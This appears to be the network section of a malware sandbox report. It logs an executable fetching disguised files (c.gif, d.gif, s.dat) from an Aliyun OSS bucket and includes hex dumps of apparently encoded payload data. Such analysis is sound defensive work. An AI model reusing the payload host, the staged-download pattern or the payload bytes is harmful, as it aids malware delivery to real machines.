                                  2025-01-11 03:35:31 UTC4096INData Raw: d5 b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3
                                  Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                  2025-01-11 03:35:31 UTC4096INData Raw: 96 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70
                                  Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                  2025-01-11 03:35:31 UTC4096INData Raw: 12 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af
                                  Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.44995239.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:32 UTC111OUTGET /c.gif HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:32 UTC545INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:32 GMT
                                  Content-Type: image/gif
                                  Content-Length: 10681
                                  Connection: close
                                  x-oss-request-id: 6781E7041F7AD9393909DEA5
                                  Accept-Ranges: bytes
                                  ETag: "10A818386411EE834D99AE6B7B68BE71"
                                  Last-Modified: Fri, 10 Jan 2025 12:30:53 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 10287299869673359293
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000104
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                  x-oss-server-time: 3
                                  2025-01-11 03:35:32 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                  2025-01-11 03:35:32 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                  Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                  2025-01-11 03:35:32 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                  Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.44996139.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:34 UTC111OUTGET /d.gif HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:34 UTC546INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:34 GMT
                                  Content-Type: image/gif
                                  Content-Length: 3892010
                                  Connection: close
                                  x-oss-request-id: 6781E7065423BA37385F30F5
                                  Accept-Ranges: bytes
                                  ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                  Last-Modified: Fri, 10 Jan 2025 12:31:05 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 3363616613234190325
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000104
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                  x-oss-server-time: 3
                                  2025-01-11 03:35:34 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                  2025-01-11 03:35:34 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                                  Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                                  2025-01-11 03:35:34 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                                  Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                  2025-01-11 03:35:34 UTC4096INData Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97
                                  Data Ascii: -J;wuwu{}uG`uWu{Q6
                                  2025-01-11 03:35:34 UTC4096INData Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79
                                  Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
                                  2025-01-11 03:35:34 UTC4096INData Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85
                                  Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                  2025-01-11 03:35:34 UTC4096INData Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3
                                  Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                  2025-01-11 03:35:34 UTC4096INData Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af
                                  Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                  2025-01-11 03:35:34 UTC4096INData Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f
                                  Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
                                  2025-01-11 03:35:34 UTC4096INData Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96
                                  Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.45001039.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:42 UTC111OUTGET /s.dat HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:43 UTC560INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:43 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 28272
                                  Connection: close
                                  x-oss-request-id: 6781E70ED4BE203730AEBD16
                                  Accept-Ranges: bytes
                                  ETag: "6CCEDC77FFDF669D35422F4A06473AC7"
                                  Last-Modified: Sat, 11 Jan 2025 03:35:20 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 8354030245854880085
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000113
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: bM7cd//fZp01Qi9KBkc6xw==
                                  x-oss-server-time: 19
                                  2025-01-11 03:35:43 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                  Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
